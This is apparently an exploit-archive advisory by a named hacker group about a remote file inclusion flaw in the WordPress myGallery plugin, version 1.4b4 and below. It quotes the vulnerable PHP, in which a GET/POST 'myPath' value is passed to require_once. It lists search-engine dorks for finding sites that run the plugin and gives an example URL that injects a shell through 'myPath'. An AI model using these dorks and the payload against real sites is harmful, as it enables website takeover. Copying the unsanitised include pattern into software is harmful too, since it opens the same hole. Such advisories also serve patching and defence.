The WordPress myGallery plugin versions 1.4b4 and below suffer from a remote file inclusion vulnerability.
77fa6b4cc771a30adfcaf9bf5ba09cd01885bb182183e15f7aa5ca0524705213
AAAAAAAAA AAAAAAAA AAA AAA AAA AAAAAAAA
AAAAAAAAA AAAAAAAAA AAA AAA AAAAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAAAAAA AAA
AAA AAAAAAAAA AAAAA AAA AAA AAA AAAAA
AAA AAAAAAAA AAA AAA AAA AAA AAAAA
AAA AAA AAA AAA AAAAAAAAA AAA AAA
AAA AAA AAA AAA AAA AAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAA AAAAAAAA
# myGallery 1.2.1(myPath)Remote File Include Vulnerablity
# Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code
#########################################################
# if (!$_POST){
# $mypath=$_GET['myPath']; <---------[+]
#
# }
# else {
# $mypath=$_POST['myPath'];<---------[+]
#
#
# }
# require_once($mypath.'/wp-config.php');<---------[+]
########################################################
# Dork :
# inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php
# Ex:
# [Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell
# Sp.Thanx = Tryag-Team